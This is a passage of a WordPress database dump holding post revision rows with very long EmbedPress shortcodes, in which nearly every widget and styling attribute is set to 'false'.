embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' width=\'1200\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\'][/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:45:19','2025-07-01 07:45:19','',1571,'http://pakhaeng.ssk.in.th/?p=1584',0,'revision','',0),
(1585,1,'2025-07-01 14:49:38','2025-07-01 07:49:38','[embedpress prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_embeded_link=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' width=\'1200\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' 